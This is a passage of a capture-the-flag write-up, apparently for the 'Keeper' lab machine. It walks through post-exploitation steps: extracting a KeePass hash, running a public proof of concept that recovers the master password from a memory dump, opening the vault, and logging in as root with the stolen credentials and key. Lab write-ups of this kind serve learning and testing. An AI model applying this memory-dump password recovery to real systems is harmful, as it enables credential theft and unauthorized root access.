b) Post Exploitation
At this stage, we already have access to the exploited machine and ensure that we still have access to it even if modifications and changes are made. During this phase, we may try to escalate our privileges to obtain the highest possible rights and hunt for sensitive data such as credentials or other data concerned with protecting (pillaging). Often times we perform post-exploitation as an input to the lateral movement process described next.
Unzipping file to reveal contents
lnorgaard@keeper:~$ unzip RT30000.zip
Archive: RT30000.zip
inflating: KeePassDumpFull.dmp
extracting: passcodes.kdbx Discovered hash with keepass2john
$keepass$*2*60000*0*5d7b4747e5a278d572fb0a66fe187ae5d74a0e2f56a2aaaf4c4f2b8ca342597d*5b7ec1cf6889266a388abe398d7990a294bf2a581156f7a7452b4074479bdea7*08500fa5a52622ab89b0addfedd5a05c*411593ef0846fc1bb3db4f9bab515b42e58ade0c25096d15f090b0fe10161125*a4842b416f14723513c5fb704a2f49024a70818e786f07e68e82a6d3d7cdbcdcHash led nowhere with bruteforce
Found POC for dumping keepass and extracting
https://github.com/matro7sh/keepass-dump-masterkey
python3 Downloads/poc.py Downloads/KeePassDumpFull.dmp
2024-02-21 21:39:20,860 [.] [main] Opened Downloads/KeePassDumpFull.dmp
Possible password: ●,dgr●d med fl●de
Possible password: ●ldgr●d med fl●de
Possible password: ●`dgr●d med fl●de
Possible password: ●-dgr●d med fl●de
Possible password: ●'dgr●d med fl●de
Possible password: ●]dgr●d med fl●de
Possible password: ●Adgr●d med fl●de
Possible password: ●Idgr●d med fl●de
Possible password: ●:dgr●d med fl●de
Possible password: ●=dgr●d med fl●de
Possible password: ●_dgr●d med fl●de
Possible password: ●cdgr●d med fl●de
Possible password: ●Mdgr●d med fl●deSearching with googler for the possible passphrase
Log in to .kdbx using passphrase: "rødgrød med fløde"
With KeePassXC locate: Network > keeper.htb
Root credentials and RSA Key
Convert PuTTY Key File to OpenSSH
Login via SSH using root credentials and OpenSSH RSA Key
Exploit root.txt
Last updated
Was this helpful?